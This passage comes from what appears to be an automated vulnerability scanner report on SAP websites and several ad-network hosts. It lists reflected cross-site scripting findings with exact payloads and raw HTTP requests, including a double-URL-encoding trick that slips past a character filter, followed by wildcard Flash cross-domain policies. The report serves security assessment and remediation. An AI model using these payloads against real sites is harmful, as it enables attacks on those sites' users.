This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
Expires: 0
Content-Length: 28819
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:26:27 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/weblogs/topic/27&e7cea"><a>41405d9f727=1"> ...[SNIP]...
3.127. http://www.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/sdn/logon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77470"><a>5b7498adf8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/sdn/logon?77470"><a>5b7498adf8d=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:27 GMT
Content-Length: 21730
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn/logon?77470"><a>5b7498adf8d=1"> ...[SNIP]...
3.128. http://www.sdn.sap.com/irj/sdn/mypoints [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/sdn/mypoints
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff7d"><a>9b3a83d8c4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/sdn/mypoints?6ff7d"><a>9b3a83d8c4b=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
Content-Length: 45094
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn/mypoints?6ff7d"><a>9b3a83d8c4b=1"> ...[SNIP]...
The value of the RelayState request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d1c0"><a>a6b35360b1d was submitted in the RelayState parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the SAMLRequest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74723"><a>f29ab74680 was submitted in the SAMLRequest parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33748
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:34:56 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... q2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D74723"><a>f29ab74680&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut" method="post" class="loginform" accept-charset="ISO-8859-1"> ...[SNIP]...
3.131. https://www.sme.sap.com/irj/sme/cpslogon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://www.sme.sap.com
Path: /irj/sme/cpslogon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45e84"><a>2f50f453e03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33752
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:35:23 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... RFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut&45e84"><a>2f50f453e03=1" method="post" class="loginform" accept-charset="ISO-8859-1"> ...[SNIP]...
3.132. https://www.sme.sap.com/irj/sme/logon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://www.sme.sap.com
Path: /irj/sme/logon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7a93"><a>335e6fbb19b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33788
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:34:19 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <select onchange="location.href='/irj/sme/logon?a7a93"><a>335e6fbb19b=1&language='+document.forms['languageform'].elements[0].value"> ...[SNIP]...
3.133. https://www.sme.sap.com/irj/sme/memberlogin [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://www.sme.sap.com
Path: /irj/sme/memberlogin
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb60"><a>b8c345a2d48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/sme/memberlogin?dcb60"><a>b8c345a2d48=1 HTTP/1.1
Host: www.sme.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/606e87a0-0e29-2c10-7fbe-8c8c4607a1c4
Expires: 0
Date: Sat, 15 Oct 2011 15:05:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sme; Path=/; secure
Content-Length: 33403
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <select onchange="location.href='/irj/sme/memberlogin?dcb60"><a>b8c345a2d48=1&language='+document.forms['languageform'].elements[0].value"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6b04'%3balert(1)//13edec9a65 was submitted in the Referer HTTP header. This input was echoed as e6b04';alert(1)//13edec9a65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd26d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85fde43dbf4c2d2df was submitted in the Referer HTTP header. This input was echoed as fd26d"><script>alert(1)</script>85fde43dbf4c2d2df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /sme/contactsap/index.epx?renderableItem=%2Fshow%2F10 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Host: www.sap.com
Connection: Keep-Alive
Cache-Control: no-cache
Referer: http://www.google.com/search?hl=en&q=fd26d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85fde43dbf4c2d2df
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:27:37 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:27:37 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3dfd26d%252522%25253e%25253cscript%25253ealert%2525281%252529%25253c%25252fscript%25253e85fde43dbf4c2d2df; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:27:37 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:27:38 GMT
Content-Length: 87820
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script language ...[SNIP]... <a href="/search?hl=en&q=fd26d"><script>alert(1)</script>85fde43dbf4c2d2df" onmouseover="window.status='Cancel';return true;" onmouseout="window.status='';return true;"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37f8e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed84849f1e63 was submitted in the Referer HTTP header. This input was echoed as 37f8e"><script>alert(1)</script>d84849f1e63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the _mkto_trk cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c85bc"><script>alert(1)</script>8f8092d2a75 was submitted in the _mkto_trk cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the HumanClickKEY cookie is copied into the HTML document as plain text between tags. The payload 322fe<script>alert(1)</script>66c84936f43 was submitted in the HumanClickKEY cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the pmelayerurl cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49b75"%3balert(1)//cd3cd8afedf was submitted in the pmelayerurl cookie. This input was echoed as 49b75";alert(1)//cd3cd8afedf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net
Response
HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 15 Oct 2011 12:05:08 GMT
Expires: Sun, 16 Oct 2011 12:05:08 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 8387
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com
Response
HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sat, 02-Oct-2021 13:47:02 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only" ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: leads.demandbase.com
Response
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:19:09 GMT
Server: Apache
Last-Modified: Wed, 10 Aug 2011 06:02:39 GMT
ETag: "9064-c9-4aa206d767dc0"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: omnituremarketing.d1.sc.omtrdc.net
Response
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 13:47:21 GMT
Server: Omniture DC/2.0.0
xserver: www337
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: omnituremarketing.tt.omtrdc.net
Response
HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sat, 15 Oct 2011 13:47:03 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: omniturestaging.staging.tt.omtrdc.net
Response
HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sat, 15 Oct 2011 13:47:09 GMT
Accept-Ranges: bytes
ETag: W/"201-1318276878000"
Connection: close
Last-Modified: Mon, 10 Oct 2011 20:01:18 GMT
Content-Length: 201
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com
Response
HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xc91 3217
Connection: keep-alive
Content-Length: 215
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: sap.112.2o7.net
Response
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:24:58 GMT
Server: Omniture DC/2.0.0
xserver: www363
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: static.2mdn.net
Response
HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 15 Oct 2011 11:49:04 GMT
Expires: Sat, 15 Oct 2011 11:25:04 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 9351
Cache-Control: public, max-age=86400
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net
Response
HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 15 Sep 2011 22:33:08 GMT
Date: Sat, 15 Oct 2011 07:13:32 GMT
Expires: Sun, 16 Oct 2011 07:13:32 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 25882
Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.connect.facebook.com
Response
HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.33.29.104
Connection: close
Content-Length: 1590
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com
Response
HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.156.45
Connection: close
Content-Length: 1590
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.sap.com
Response
HTTP/1.1 200 OK
Cache-Control: max-age=7200
Content-Type: text/xml
Last-Modified: Mon, 31 Jan 2011 14:40:15 GMT
Accept-Ranges: bytes
ETag: "66f151c654c1cb1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:47 GMT
Connection: close
Content-Length: 765
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.sap.com
Response
HTTP/1.1 200 OK
Cache-Control: max-age=7200
